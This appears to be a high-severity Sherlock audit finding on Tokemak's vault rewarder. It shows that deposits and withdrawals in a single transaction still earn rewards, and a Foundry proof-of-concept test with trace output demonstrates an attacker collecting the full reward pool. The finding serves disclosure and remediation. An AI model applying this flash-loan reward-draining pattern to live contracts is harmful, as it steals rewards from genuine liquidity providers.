Bald Grape Dragonfly

high

# Flashloan to subtract rewards since users can claim rewards immediately after depositing into the vault.
## Summary

It is possible to abuse the current design of the rewarder since a user is able to claim rewards after depositing into the vault. With this scenario it is possible to execute a flashloan attack exclusively for claiming rewards. 

## Vulnerability Detail

Since the Rewarder model does not have a tracking mechanism and checkpoints in place it is possible to execute a flashloan attack. In one transaction a malicious user is able to send a flashloan (deposit a considerable big amount of assets and then withdraw), and claim the corresponding rewards.

### PoC
```Solidity
    function test_flash_loan() external {       
      
        address attacker = makeAddr("attacker");
        _asset.mint(attacker, 50 ether);        

        _accessController.grantRole(Roles.DV_REWARD_MANAGER_ROLE, address(this));
        _lmpVault.rewarder().addToWhitelist(address(this));      
        _toke.mint(address(this), 1000e18);
        _toke.approve(address(_lmpVault.rewarder()), 1000e18);
        _lmpVault.rewarder().queueNewRewards(1000e18);
      
        vm.roll(block.number + 10_000);
      
        vm.startPrank(attacker);
        _asset.approve(address(_lmpVault), 50 ether);
        _lmpVault.deposit(50 ether, attacker);
        _lmpVault.withdraw(50 ether, attacker, attacker);
        vm.stopPrank();
        assert(_toke.balanceOf(attacker) > 0);
        
    }
```
```Solidity
    ├─ [0] VM::stopPrank() 
    │   └─ ← ()
    ├─ [563] toke::balanceOf(attacker: [0x9dF0C6b0066D5317aA5b38B36850548DaCCa6B4e]) [staticcall]
    │   └─ ← 1000000000000000000000 [1e21]
    └─ ← ()
```



As we can see in this short but illustrative PoC, it is possible for an attacker to introduce a huge amount of assets, withdraw them and then claim for rewards since the model allows to do that when immediately depositing into the vault. Basically this is almost like subtracting rewards for free. 


## Impact

Any user can claim for rewards after immediately depositing into the vault. This can lead to:

Flash Loan attack (like the PoC) to steal rewards
Steal rewards from users that are really providing liquidity and not just depositing and withdrawing in one transaction. This can be considered as DoS since an attacker is draining a considerable part of the rewards for well-behaved and loyal users. 

## Code Snippet

https://github.com/sherlock-audit/2023-06-tokemak/blob/5d8e902ce33981a6506b1b5fb979a084602c6c9a/v2-core-audit-2023-07-14/src/vault/LMPVault.sol#L854-L864 
https://github.com/sherlock-audit/2023-06-tokemak/blob/5d8e902ce33981a6506b1b5fb979a084602c6c9a/v2-core-audit-2023-07-14/src/rewarders/AbstractRewarder.sol#L128-L140
## Tool used

Manual Review

## Recommendation

A tracking mechanism must be implemented for transfers within the rewarder to prevent the above scenario. It is particularly important to update/ implement checkpoints when dealing with user balances, especially in the current design model where nothing prevents arbitrary deposits and withdrawals with rewards claiming .

Further tests need to be conducted within RewardVault.t to comprehensively evaluate the emission of rewards.


